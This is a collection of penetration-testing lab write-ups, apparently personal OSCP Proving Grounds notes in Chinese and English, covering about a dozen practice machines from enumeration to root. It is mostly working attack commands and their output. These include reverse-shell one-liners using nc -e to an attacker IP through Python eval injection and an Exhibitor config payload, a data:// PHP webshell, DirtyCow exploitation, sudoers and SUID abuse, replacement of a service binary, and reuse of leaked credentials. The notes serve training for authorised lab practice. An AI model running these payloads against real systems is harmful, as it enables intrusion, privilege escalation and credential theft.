PS C:\Users\shenzi> cp //192.168.45.228/share/evil.msi .
PS C:\Users\shenzi> msiexec /q /i evil.msi
PS C:\Users\shenzi> Proof
┌──(kali㉿kali)-[~/oscp/pg/Shenzi]
└─$ rlwrap nc -lvnp 443
listening on [any] 443 ...
connect to [192.168.45.228] from (UNKNOWN) [192.168.162.55] 49971
Microsoft Windows [Version 10.0.19042.1526]
(c) Microsoft Corporation. All rights reserved.
C:\WINDOWS\system32>whoami
whoami
nt authority\system
C:\WINDOWS\system32>Nukem
Service Enumeration
Port Scan Results
| Server IP Address | Ports Open |
| 192.168.162.105 | TCP:22,80,3306,5000,13000,36445 |
Web enumeration
在 80 port 的網站使用 wordpress ,用 wpscan 找到有 RCE plugin
Initial Access
使用 exploit 修改 revshell IP Port
┌──(kali㉿kali)-[~/oscp/pg/Nukem]
└─$ rlwrap nc -lvnp 5000
listening on [any] 5000 ...
connect to [192.168.45.228] from (UNKNOWN) [192.168.162.105] 59552
bash: cannot set terminal process group (350): Inappropriate ioctl for device
bash: no job control in this shell
[http@nukem simple-file-list]$ python3 -c 'import pty;pty.spawn("/bin/bash")'
python3 -c 'import pty;pty.spawn("/bin/bash")'
[http@nukem simple-file-list]$ cd /home
cd /home
[http@nukem home]$ ls
ls
commander
[http@nukem home]$ cd commander
cd commander
[http@nukem commander]$ cat local.txt
cat local.txt
650e1ccaa35f92bb7f6903dc8c80a5e2
[http@nukem commander]$ privilege escalation – setuid
檢查 SUID 發現有 dosbox 可以利用,參考 目前拿到的身分是 http ,修改 /etc/sudoers 讓 http 可以無密碼用 sudo 去執行指令
Proof
[http@nukem simple-file-list]$ DATA="http ALL=NOPASSWD:ALL"
DATA="http ALL=NOPASSWD:ALL"
[http@nukem simple-file-list]$ LFILE='\etc\sudoers'
LFILE='\etc\sudoers'
[http@nukem simple-file-list]$ /usr/bin/dosbox -c 'mount c /' -c "echo $DATA >>c:$LFILE" -c exit
<x -c 'mount c /' -c "echo $DATA >>c:$LFILE" -c exit
DOSBox version 0.74-3
Copyright 2002-2019 DOSBox Team, published under GNU GPL.
---
ALSA lib confmisc.c:767:(parse_card) cannot find card '0'
ALSA lib conf.c:4743:(_snd_config_evaluate) function snd_func_card_driver returned error: No such file or directory
ALSA lib confmisc.c:392:(snd_func_concat) error evaluating strings
ALSA lib conf.c:4743:(_snd_config_evaluate) function snd_func_concat returned error: No such file or directory
ALSA lib confmisc.c:1246:(snd_func_refer) error evaluating name
ALSA lib conf.c:4743:(_snd_config_evaluate) function snd_func_refer returned error: No such file or directory
ALSA lib conf.c:5231:(snd_config_expand) Evaluate error: No such file or directory
ALSA lib pcm.c:2660:(snd_pcm_open_noupdate) Unknown PCM default
CONFIG: Using default settings. Create a configfile to change them
MIXER:Can't open audio: No available audio device , running in nosound mode.
ALSA:Can't subscribe to MIDI port (65:0) nor (17:0)
MIDI:Opened device:none
SHELL:Redirect output to c:\etc\sudoers
[http@nukem simple-file-list]$ sudo su
sudo su
[root@nukem simple-file-list]# cat /root/proof.txt
cat /root/proof.txt
d6586a7bfffcaf473ba5f38b00b3ca60
[root@nukem simple-file-list]# Medjed
Service Enumeration
Port Scan Results
| Server IP Address | Ports Open |
| 192.168.162.127 | TCP:135,139,445,3306,5040,8000,30021,33033,44330,45332,45443 |
Web enumeration
8000 port 跑一個,待設定的頁面,隨便填一填,之後就能點選 Web-File-Server 。能訪問全部 windows 的資料夾(含 administrator)
Initial Access – file upload to RCE
直接上傳 webshell 上去 xampp 存放網站程式的資料夾。xampp 執行的端口在 45443
Proof
┌──(kali㉿kali)-[~/oscp/pg/Medjed]
└─$ rlwrap nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.45.228] from (UNKNOWN) [192.168.162.127] 50011
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ==================================== ========
SeShutdownPrivilege Shut down the system Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
PS C:\xampp\htdocs> cd ~
PS C:\Users\Jerren> type desktop\local.txt
2b07982d3503be5f449a0fe11e275415
PS C:\Users\Jerren> privilege escalation
用 PowerUp.ps1 檢查發現,對 bd.exe 有 modify 權限
PS C:\Users\Jerren> powershell -ep bypass
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
Try the new cross-platform PowerShell https://aka.ms/pscore6
PS C:\Users\Jerren>
PS C:\Users\Jerren> . .\PowerUp.ps1
PS C:\Users\Jerren> Invoke-AllChecks
ServiceName : bd
Path : "C:\bd\bd.exe"
ModifiableFile : C:\bd\bd.exe
ModifiableFilePermissions : {Delete, WriteAttributes, Synchronize, ReadControl...}
ModifiableFileIdentityReference : NT AUTHORITY\Authenticated Users
StartName : LocalSystem
AbuseFunction : Install-ServiceBinary -Name 'bd'
CanRestart : False
Name : bd
Check : Modifiable Service Files生成一個 revshell exe ,並命名為 bd.exe ,在重啟
PS C:\bd> cp //192.168.45.228/share/exp.exe .
PS C:\bd> mv exp.exe bd.exe
dir
PS C:\bd>
Directory: C:\bd
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 11/3/2020 12:29 PM applications
d----- 11/3/2020 12:29 PM cache
d----- 11/3/2020 12:29 PM cmsdocs
d----- 11/3/2020 12:29 PM data
d----- 11/3/2020 12:29 PM themes
d----- 8/1/2024 10:49 PM trace
-a---- 11/3/2020 12:29 PM 38 bd.conf
-a---- 11/3/2020 12:29 PM 259 bd.dat
-a---- 6/11/2025 4:34 AM 7168 bd.exe
-a---- 4/26/2013 5:55 PM 1661648 bd.exe.bak
-a---- 6/12/2011 4:49 PM 207 bd.lua
-a---- 4/26/2013 5:55 PM 912033 bd.zip
-a---- 6/14/2012 12:21 PM 33504 bdctl.exe
-a---- 6/11/2025 4:12 AM 151 dbcfg.dat
-a---- 6/11/2025 4:12 AM 135 drvcnstr.dat
-a---- 6/11/2025 4:12 AM 28 emails.dat
-a---- 12/3/2010 4:52 PM 5139 install.txt
-a---- 10/26/2010 4:38 PM 421200 msvcp100.dll
-a---- 10/26/2010 4:38 PM 770384 msvcr100.dll
-a---- 2/18/2013 10:39 PM 240219 non-commercial-license.rtf
-a---- 8/1/2024 10:49 PM 6 pidfile
-a---- 4/26/2013 5:50 PM 16740 readme.txt
-a---- 6/11/2025 4:12 AM 808 roles.dat
-a---- 6/14/2012 12:21 PM 383856 sqlite3.exe
-a---- 6/11/2025 4:12 AM 78 tuncnstr.dat
-a---- 11/3/2020 12:29 PM 133107 Uninstall.exe
-a---- 6/11/2025 4:12 AM 461 user.dat
PS C:\bd> shutdown -r -t 0
PS C:\bd> Proof
┌──(kali㉿kali)-[~/oscp/pg]
└─$ rlwrap nc -lvnp 6969
listening on [any] 6969 ...
connect to [192.168.45.228] from (UNKNOWN) [192.168.162.127] 49668
Microsoft Windows [Version 10.0.19042.1387]
(c) Microsoft Corporation. All rights reserved.
C:\WINDOWS\system32>whoami
whoami
nt authority\system
C:\WINDOWS\system32>type c:\users\administrator\desktop\proof.txt
type c:\users\administrator\desktop\proof.txt
d6607916b6fce1744f4c05a055d1d5c6
C:\WINDOWS\system32>Hetemit
Service Enumeration
Port Scan Results
| Server IP Address | Ports Open |
| 192.168.162.117 | TCP:21,22,80,139,445,18000,50000 |
Web enumeration
在 50000 port 用 Python 3.6.8 跑的網站 API 端點有 command injection,猜測應該是用 eval 在執行
┌──(kali㉿kali)-[~/oscp/pg/Hetemit]
└─$ curl -X POST -d "code=8*9" http://192.168.162.117:50000/verify
72
┌──(kali㉿kali)-[~/oscp/pg/Hetemit]
└─$ curl -X POST -d "code=id" http://192.168.162.117:50000/verify
<built-in function id>
┌──(kali㉿kali)-[~/oscp/pg/Hetemit]
└─$ curl -X POST -d "code=8*9" http://192.168.162.117:50000/verify
72
┌──(kali㉿kali)-[~/oscp/pg/Hetemit]
└─$ curl -X POST -d "code=8%2B9" http://192.168.162.117:50000/verify
17
---
使用 ipython3 去模擬
In [15]: code='id'
In [16]: eval(code)
Out[16]: <function id(obj, /)>
In [17]: code='8*9'
In [18]: eval(code)
Out[18]: 72
In [19]: Initial Access – command injection
因為輸出結果都是 0 ,用 ping 看看指令是否有在執行
┌──(kali㉿kali)-[~/oscp/pg/Hetemit]
└─$ curl -X POST -d "code=__import__('os').system('ping -c 4 192.168.45.228')" http://192.168.162.117:50000/verify
0
---
┌──(kali㉿kali)-[~/oscp/pg/Hetemit]
└─$ sudo tcpdump -i tun0 icmp
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
03:27:15.567447 IP 192.168.162.117 > 192.168.45.228: ICMP echo request, id 2357, seq 1, length 64
03:27:15.567996 IP 192.168.45.228 > 192.168.162.117: ICMP echo reply, id 2357, seq 1, length 64
03:27:16.567896 IP 192.168.162.117 > 192.168.45.228: ICMP echo request, id 2357, seq 2, length 64
03:27:16.567912 IP 192.168.45.228 > 192.168.162.117: ICMP echo reply, id 2357, seq 2, length 64
03:27:17.568610 IP 192.168.162.117 > 192.168.45.228: ICMP echo request, id 2357, seq 3, length 64
03:27:17.568625 IP 192.168.45.228 > 192.168.162.117: ICMP echo reply, id 2357, seq 3, length 64
03:27:18.569436 IP 192.168.162.117 > 192.168.45.228: ICMP echo request, id 2357, seq 4, length 64
03:27:18.569452 IP 192.168.45.228 > 192.168.162.117: ICMP echo reply, id 2357, seq 4, length 64
Proof
┌──(kali㉿kali)-[~/oscp/pg/Hetemit]
└─$ rlwrap nc -lvnp 18000
listening on [any] 18000 ...
connect to [192.168.45.228] from (UNKNOWN) [192.168.162.117] 41052
python3 -c 'import pty;pty.spawn("/bin/bash")'
[cmeeks@hetemit restjson_hetemit]$ ls
ls
app.py __pycache__
[cmeeks@hetemit restjson_hetemit]$ cd ~
cd ~
[cmeeks@hetemit ~]$ ls
ls
local.txt register_hetemit restjson_hetemit share
[cmeeks@hetemit ~]$ cat local.txt
cat local.txt
bb223682a73fa4645b957710a15fb308
[cmeeks@hetemit ~]$ privilege escalation
sudo -l 發現有 /sbin/halt, /sbin/reboot, /sbin/poweroff 這些權限可以用,參考 這篇 提權方法。需要編輯文件所以要拿到完整可以互動的 shell
nc -lvnp PORT (不能用 rlwarp
ctrl+z
stty raw -echo;fg┌──(kali㉿kali)-[~]
└─$ nc -lvnp 18000
listening on [any] 18000 ...
connect to [192.168.45.228] from (UNKNOWN) [192.168.162.117] 41018
python3 -c 'import pty;pty.spawn("/bin/bash")'
[cmeeks@hetemit restjson_hetemit]$ cd ~
cd ~
[cmeeks@hetemit ~]$ sudo -l
sudo -l
Matching Defaults entries for cmeeks on hetemit:
!visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin,
env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS",
env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE",
env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES",
env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE",
env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin
User cmeeks may run the following commands on hetemit:
(root) NOPASSWD: /sbin/halt, /sbin/reboot, /sbin/poweroff
[cmeeks@hetemit ~]$ ^Z
zsh: suspended nc -lvnp 18000
┌──(kali㉿kali)-[~]
└─$ stty raw -echo;fg
[1] + continued nc -lvnp 18000
pwd
/home/cmeeks
[cmeeks@hetemit ~]$ 編輯 /etc/systemd/system/pythonapp.service 把執行 50000 port service 的 user 改成 root
[Unit]
Description=Python App
After=network-online.target
[Service]
Type=simple
WorkingDirectory=/home/cmeeks/restjson_hetemit
ExecStart=flask run -h 0.0.0.0 -p 50000
TimeoutSec=30
RestartSec=15s
User=root
ExecReload=/bin/kill -USR1 $MAINPID
Restart=on-failure
[Install]
WantedBy=multi-user.target再用一樣的手法打一次
Proof
┌──(kali㉿kali)-[~/oscp/pg/Hetemit]
└─$ curl -X POST -d "code=__import__('os').system('nc 192.168.45.228 80 -e /bin/bash')" http://192.168.162.117:50000/verify
---
┌──(kali㉿kali)-[~/oscp/pg/Hetemit]
└─$ rlwrap nc -lvnp 80
listening on [any] 80 ...
connect to [192.168.45.228] from (UNKNOWN) [192.168.162.117] 51908
id
uid=0(root) gid=0(root) groups=0(root)
cat /root/proof.txt
e95d6f9049dffa91d565fb7b5abc1982
Nickel
Service Enumeration
Port Scan Results
| Server IP Address | Ports Open |
| 192.168.162.99 | TCP:21,22,80,135,139,445,3389,5040,7680,8089,33333 |
Web enumeration
在 8089 port 其中點選其中一個按鈕,可以看到會向 IP:33333 發請求
直接用 GET 會收到
┌──(kali㉿kali)-[~/oscp/pg/Nickel]
└─$ curl http://192.168.162.99:33333/list-running-procs
<p>Cannot "GET" /list-running-procs</p> 直接用 POST 會需要設定 Content-Length,最後用帶有 Content-Length 的 header 去訪問
┌──(kali㉿kali)-[~/oscp/pg/Nickel]
└─$ curl -X POST http://192.168.162.99:33333/list-running-procs -H "Content-Length: 0"
name : System Idle Process
commandline :
name : System
commandline :
name : Registry
commandline :
name : smss.exe
commandline :
name : csrss.exe
commandline :
name : wininit.exe
commandline :
name : csrss.exe
commandline :
name : winlogon.exe
commandline : winlogon.exe
name : services.exe
commandline :
name : lsass.exe
commandline : C:\Windows\system32\lsass.exe
name : fontdrvhost.exe
commandline : "fontdrvhost.exe"
name : fontdrvhost.exe
commandline : "fontdrvhost.exe"
name : dwm.exe
commandline : "dwm.exe"
name : powershell.exe
commandline : powershell.exe -nop -ep bypass C:\windows\system32\ws80.ps1
name : conhost.exe
commandline : \??\C:\Windows\system32\conhost.exe 0x4
name : Memory Compression
commandline :
name : cmd.exe
commandline : cmd.exe C:\windows\system32\DevTasks.exe --deploy C:\work\dev.yaml --user ariah -p
"Tm93aXNlU2xvb3BUaGVvcnkxMzkK" --server nickel-dev --protocol ssh
name : powershell.exe
commandline : powershell.exe -nop -ep bypass C:\windows\system32\ws8089.ps1
name : powershell.exe
commandline : powershell.exe -nop -ep bypass C:\windows\system32\ws33333.ps1
name : FileZilla Server.exe
commandline : "C:\Program Files (x86)\FileZilla Server\FileZilla Server.exe"
name : sshd.exe
commandline : "C:\Program Files\OpenSSH\OpenSSH-Win64\sshd.exe"
name : VGAuthService.exe
commandline : "C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.exe"
name : vm3dservice.exe
commandline : C:\Windows\system32\vm3dservice.exe
name : vmtoolsd.exe
commandline : "C:\Program Files\VMware\VMware Tools\vmtoolsd.exe"
name : vm3dservice.exe
commandline : vm3dservice.exe -n
name : dllhost.exe
commandline : C:\Windows\system32\dllhost.exe /Processid:{02D4B3F1-FD88-11D1-960D-00805FC79235}
name : WmiPrvSE.exe
commandline : C:\Windows\system32\wbem\wmiprvse.exe
name : msdtc.exe
commandline : C:\Windows\System32\msdtc.exe
name : LogonUI.exe
commandline : "LogonUI.exe" /flags:0x2 /state0:0xa3957055 /state1:0x41c64e6d
name : conhost.exe
commandline : \??\C:\Windows\system32\conhost.exe 0x4
name : conhost.exe
commandline : \??\C:\Windows\system32\conhost.exe 0x4
name : conhost.exe
commandline : \??\C:\Windows\system32\conhost.exe 0x4
name : WmiPrvSE.exe
commandline : C:\Windows\system32\wbem\wmiprvse.exe
name : MicrosoftEdgeUpdate.exe
commandline : "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /c
name : SgrmBroker.exe
commandline :
name : SearchIndexer.exe
commandline : C:\Windows\system32\SearchIndexer.exe /Embedding
name : CompatTelRunner.exe
commandline : C:\Windows\system32\compattelrunner.exe
name : conhost.exe
commandline : \??\C:\Windows\system32\conhost.exe 0x4
name : CompatTelRunner.exe
commandline : C:\Windows\system32\compattelrunner.exe -maintenance
name : conhost.exe
commandline : \??\C:\Windows\system32\conhost.exe 0x4
name : WmiApSrv.exe
commandline : C:\Windows\system32\wbem\WmiApSrv.exe其中發現 commandline 有一行有 ssh 的 username & password
Initial Access – use leak info ssh login machine
密碼用 base64 decode 後得到 NowiseSloopTheory139,用 ariah/NowiseSloopTheory139 登入SSH
Proof
┌──(kali㉿kali)-[~/oscp/pg/Nickel]
└─$ ssh ariah@192.168.162.99
The authenticity of host '192.168.162.99 (192.168.162.99)' can't be established.
ED25519 key fingerprint is SHA256:e25NU8Sljo45nzplpVGugSC5xB5vToeqoHPYJkQqbPU.
This host key is known by the following other names/addresses:
~/.ssh/known_hosts:57: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.162.99' (ED25519) to the list of known hosts.
ariah@192.168.162.99's password:
Microsoft Windows [Version 10.0.18362.1016]
(c) 2019 Microsoft Corporation. All rights reserved.
ariah@NICKEL C:\Users\ariah>type desktop\local.txt
5f286730b01157a6b18934327ce63538
ariah@NICKEL C:\Users\ariah> privilege escalation
在 C:\ftp 發現一個文件 Infrastructure.pdf,並且設有密碼。使用 pdf2john 並破解 hash 得到密碼 ariah4168。查看文件可以發現有一處有 command 的 endpoint
將已經拿到的 user (ariah) 加進去 administrators group
┌──(kali㉿kali)-[~/oscp/pg/Nickel]
└─$ curl "http://192.168.162.99/?net%20localgroup%20administrators%20ariah%20/add"
<!doctype html><html><body>dev-api started at 2024-08-03T05:08:16
<pre>The command completed successfully.
</pre>
</body></html>RDP 進去拿 proof.txt
Proof
ZenPhoto
Service Enumeration
Port Scan Results
| Server IP Address | Ports Open |
| 192.168.162.41 | TCP:22,23,80,3306 |
Web enumeration
爆目錄找到 /test ,運行著 zenphoto ,有 RCE 漏洞
Initial Access
┌──(kali㉿kali)-[~/oscp/pg/ZenPhoto]
└─$ php 18083 192.168.162.41 /test/
+-----------------------------------------------------------+
| Zenphoto <= 1.4.1.4 Remote Code Execution Exploit by EgiX |
+-----------------------------------------------------------+
zenphoto-shell# id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
zenphoto-shell# ls /home
local.txt
zenphoto-shell# cat /home/local.txt
72a5777ab52bd15079a3e3e02436c1e2
zenphoto-shell# privilege escalation
用 lineas 看到有 dirtycow 可以打,用 dirty.c
Proof
www-data@offsecsrv:/tmp$ wget 192.168.45.228:8000/dirty.c
wget 192.168.45.228:8000/dirty.c
--2025-06-11 10:19:52-- http://192.168.45.228:8000/dirty.c
Connecting to 192.168.45.228:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4815 (4.7K) [text/x-csrc]
Saving to: `dirty.c'
100%[======================================>] 4,815 --.-K/s in 0s
2025-06-11 10:19:53 (21.1 MB/s) - `dirty.c' saved [4815/4815]
www-data@offsecsrv:/tmp$ gcc -pthread dirty.c -o dirty -lcrypt
gcc -pthread dirty.c -o dirty -lcrypt
www-data@offsecsrv:/tmp$ ./dirty
./dirty
/etc/passwd successfully backed up to /tmp/passwd.bak
Please enter the new password: pwn
Complete line:
firefart:fiY9IH9EEmntk:0:0:pwned:/root:/bin/bash
mmap: b77a2000
ptrace 0
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password 'pwn'.
DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd
www-data@offsecsrv:/tmp$
www-data@offsecsrv:/tmp$ madvise 0
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password 'pwn'.
DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd
www-data@offsecsrv:/tmp$ su firefart
su firefart
Password: pwn
firefart@offsecsrv:/tmp# cat /root/proof.txt
cat /root/proof.txt
9a1b4905fb1301bf61cd99d581ead841
firefart@offsecsrv:/tmp# Nibbles
Service Enumeration
Port Scan Results
| Server IP Address | Ports Open |
| 192.168.162.47 | TCP:21,22,80,5437 |
postgres enumeration
weak password postgres/postgres 登入成功,運行的版本有 RCE 漏洞
Initial Access
使用 exploit
┌──(kali㉿kali)-[~/oscp/pg/Nibbles]
└─$ python3 50847 -i 192.168.162.47 -p 5437 -U postgres -P postgres -c id
[+] Connecting to PostgreSQL Database on 192.168.162.47:5437
[+] Connection to Database established
[+] Checking PostgreSQL version
[+] PostgreSQL 11.7 is likely vulnerable
[+] Creating table _c5022142c68aa9060a84a6dff8fb4534
[+] Command executed
uid=106(postgres) gid=113(postgres) groups=113(postgres),112(ssl-cert)
[+] Deleting table _c5022142c68aa9060a84a6dff8fb4534Proof
┌──(kali㉿kali)-[~/oscp/pg/Nibbles]
└─$ rlwrap nc -lvnp 21
listening on [any] 21 ...
connect to [192.168.45.228] from (UNKNOWN) [192.168.162.47] 39278
bash: cannot set terminal process group (1359): Inappropriate ioctl for device
bash: no job control in this shell
postgres@nibbles:/var/lib/postgresql$ cd /home
cd /home
postgres@nibbles:/home$ ls
ls
wilson
postgres@nibbles:/home$ cd wilson
cd wilson
postgres@nibbles:/home/wilson$ ls
ls
ftp
local.txt
postgres@nibbles:/home/wilson$ cat local.txt
cat local.txt
a242cd4b5e026c7750a45e830222c37d
postgres@nibbles:/home/wilson$ privilege escalation – SUID
find 有 suid 利用 find 提權
postgres@nibbles:/home/wilson$ find . -exec /bin/bash -p \; -quit
find . -exec /bin/bash -p \; -quit
id
uid=106(postgres) gid=113(postgres) euid=0(root) groups=113(postgres),112(ssl-cert)
cat /root/proof.txt
3c619a1a2408c1c09c953b52167d954eSquid
Service Enumeration
Port Scan Results
| Server IP Address | Ports Open |
| 192.168.162.189 | TCP:135,139,445,3128 |
3128 port 運行 Squid http proxy ,使用 https://github.com/aancw/spose 找到有開 8080 & 3306 port
┌──(kali㉿kali)-[~/oscp/pg/Squid/spose]
└─$ python3 spose.py --proxy 192.168.162.189:3128 --target 192.168.162.189
Scanning default common ports
Using proxy address 192.168.162.189:3128
192.168.162.189:3306 seems OPEN
192.168.162.189:8080 seems OPEN在 firefox 設定好 proxy 就可以訪問網站的 8080 port
Initial Access – run sql shell to RCE
訪問 /phpmyadmin ,用 root 和空密碼可以成功登入。再利用 sql 將 webshell 寫入檔案
Proof
┌──(kali㉿kali)-[~/oscp/pg/Squid]
└─$ rlwrap nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.45.228] from (UNKNOWN) [192.168.162.189] 49719
whoami
nt authority\system
PS C:\wamp\www> type c:\users\administrator\desktop\proof.txt
feacfd5a024980898930072a23b3e23a
PS C:\wamp\www> Snookums
Service Enumeration
Port Scan Results
| Server IP Address | Ports Open |
| 192.168.228.58 | TCP:21,22,80,110,139,445,3306 |
Web Enumeration
網頁打開可以看到 Simple PHP Photo Gallery v0.8 查了一下發現有 RFL
Initial Access – RFI to RCE
RFL payload :
data://text/plain,<?php system($_GET['cmd']);?>&cmd=id收到 revshell 後,可以發現有一個 db.php 的檔案裏面有 mysql 的 root password ,在 DB 中找到 users table 並且裡面有 username & password
bash-4.2$ cat db.php
cat db.php
<?php
define('DBHOST', '127.0.0.1');
define('DBUSER', 'root');
define('DBPASS', 'MalapropDoffUtilize1337');
define('DBNAME', 'SimplePHPGal');
?>
bash-4.2$ mysql -uroot -pMalapropDoffUtilize1337 -h localhost
mysql -uroot -pMalapropDoffUtilize1337 -h localhost
mysql: [Warning] Using a password on the command line interface can be insecure.
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 10
Server version: 8.0.20 MySQL Community Server - GPL
Copyright (c) 2000, 2020, Oracle and/or its affiliates. All rights reserved.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql> show databases;
show databases;
+--------------------+
| Database |
+--------------------+
| SimplePHPGal |
| information_schema |
| mysql |
| performance_schema |
| sys |
+--------------------+
5 rows in set (0.01 sec)
mysql> use SimplePHPGal;
use SimplePHPGal;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> show tables;
show tables;
+------------------------+
| Tables_in_SimplePHPGal |
+------------------------+
| users |
+------------------------+
1 row in set (0.00 sec)
mysql> select * from users;
select * from users;
+----------+----------------------------------------------+
| username | password |
+----------+----------------------------------------------+
| josh | VFc5aWFXeHBlbVZJYVhOelUyVmxaSFJwYldVM05EYz0= |
| michael | U0c5amExTjVaRzVsZVVObGNuUnBabmt4TWpNPQ== |
| serena | VDNabGNtRnNiRU55WlhOMFRHVmhiakF3TUE9PQ== |
+----------+----------------------------------------------+
3 rows in set (0.00 sec)
mysql> exit
exit
Bye
bash-4.2$ decode 兩次後,拿到 michael 的 password
Proof
bash-4.2$ su michael
su michael
Password: HockSydneyCertify123
[michael@snookums html]$ sudo su
sudo su
We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:
#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.
[sudo] password for michael: HockSydneyCertify123
michael is not in the sudoers file. This incident will be reported.
[michael@snookums html]$ cd ~
cd ~
[michael@snookums ~]$ ls
ls
local.txt
[michael@snookums ~]$ cat local.txt
cat local.txt
661ee72bc8c6e0170dfd2da58e3be5ab
[michael@snookums ~]$
Privilege Escalation – modify /etc/passwd
用 linpeas 發現 /etc/passwd 可以改,用剛剛拿到的帳密 ssh 登入進去,進去改 /etc/passwd
Proof
[michael@snookums ~]$ openssl passwd pwn
ZOPukRruoWuxg
[michael@snookums ~]$ vi /etc/passwd
[michael@snookums ~]$ su root
Password:
[root@snookums michael]# cat /root/proof.txt
fdf25ed925ac23431cfd978f8fdc9e4a
[root@snookums michael]# Payday
Service Enumeration
Port Scan Results
| Server IP Address | Ports Open |
| 192.168.162.39 | TCP:22,80,110,139,143,445,993,995 |
Web Enumeration
網站運行 CS-Cart 搜尋一下發現可以 RCE https://gist.github.com/momenbasel/ccb91523f86714edb96c871d4cf1d05c
Initial Access – file upload to rce
用 weak password 登入 /admin.php admin/admin ,找到 Template editor 上傳一個 phtml 檔案 ,之後訪問 /skins 可以直接看到剛剛上傳的 revshell
┌──(kali㉿kali)-[~/oscp/pg/Payday]
└─$ rlwrap nc -lvnp 110
listening on [any] 110 ...
connect to [192.168.45.228] from (UNKNOWN) [192.168.162.39] 41293
bash: no job control in this shell
www-data@payday:/var/www/skins$ ls /home
patrick
www-data@payday:/var/www/skins$ cd /home/patrick && cat local.txt
d60a1e66c281ae45e8bad22513caf202
www-data@payday:/home/patrick$ Privilege Escalation
用 weak password patrick/patrick 成功切換到 patrick 身分
patrick@payday:~$ sudo -l
sudo -l
We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:
#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.
[sudo] password for patrick:patrick
User patrick may run the following commands on this host:
(ALL) ALL
patrick@payday:~$ sudo su
sudo su
root@payday:/home/patrick# cat /root/proof.txt
cat /root/proof.txt
4b853a3f3c3732e0d748f5718c0ddbb3
root@payday:/home/patrick# Pelican
Service Enumeration
Port Scan Results
| Server IP Address | Ports Open |
| 192.168.188.98 | TCP:22,139,445,631,2181,2222,8080,8081,39605 |
Web Enumeration
打開網站 8081 端口會被 redirect 到 http://IP:8080/exhibitor/v1/ui/index.html ,在此頁面可以看到運行著 Exhibitor for ZooKeeper,有 RCE 漏洞
Initial Access – Web RCE
參考 https://github.com/thehunt1s0n/Exihibitor-RCE/blob/main/exploit.sh
┌──(kali㉿kali)-[~/oscp/pg/Pelican]
└─$ cat payload
curl -s -X POST -d '{"zookeeperInstallDirectory":"/opt/zookeeper","zookeeperDataDirectory":"/zookeeper/data","zookeeperLogDirectory":"","logIndexDirectory":"","autoManageInstancesSettlingPeriodMs":"10000","autoManageInstancesFixedEnsembleSize":"0","autoManageInstancesApplyAllAtOnce":"1","observerThreshold":"3","serversSpec":"1:pelican","javaEnvironment":"$(/bin/nc -e /bin/sh '192.168.45.186' '4444' &)","log4jProperties":"","clientPort":"2181","connectPort":"2888","electionPort":"3888","checkMs":"2000","cleanupPeriodMs":"200000","cleanupMaxFiles":"10","backupPeriodMs":"60000","backupMaxStoreMs":"86400000","autoManageInstances":"1","zooCfgExtra":{"syncLimit":"5","tickTime":"2000","initLimit":"10"},"backupExtra":{},"serverId":1}' http://192.168.188.98:8080/exhibitor/v1/config/set
┌──(kali㉿kali)-[~/oscp/pg/Pelican]
└─$ bash payload
{"message":"OK","succeeded":true} Proof
┌──(kali㉿kali)-[~/oscp/pg/Pelican]
└─$ rlwrap nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.45.186] from (UNKNOWN) [192.168.188.98] 41012
python3 -c 'import pty;pty.spawn("/bin/bash")'
charles@pelican:/opt/zookeeper$ cd ~
cd ~
charles@pelican:~$ ls
ls
local.txt
charles@pelican:~$ cat local.txt
cat local.txt
3be5bda7f0c6a5c389c952b07d8a5861
charles@pelican:~$ privilege escalation – run gcore as root
可以已 root 身分使用 gcore ,並且查看進程有疑似可能洩漏 password
charles@pelican:~$ sudo -l
sudo -l
Matching Defaults entries for charles on pelican:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User charles may run the following commands on pelican:
(ALL) NOPASSWD: /usr/bin/gcore
charles@pelican:~$ ps aux | grep pass
ps aux | grep pass
root 513 0.0 0.0 2276 112 ? Ss 20:04 0:00 /usr/bin/password-store
charles 12689 0.0 0.0 6076 824 pts/2 S+ 20:46 0:00 grep passdumps of running processes
charles@pelican:~$ sudo /usr/bin/gcore 513
sudo /usr/bin/gcore 513
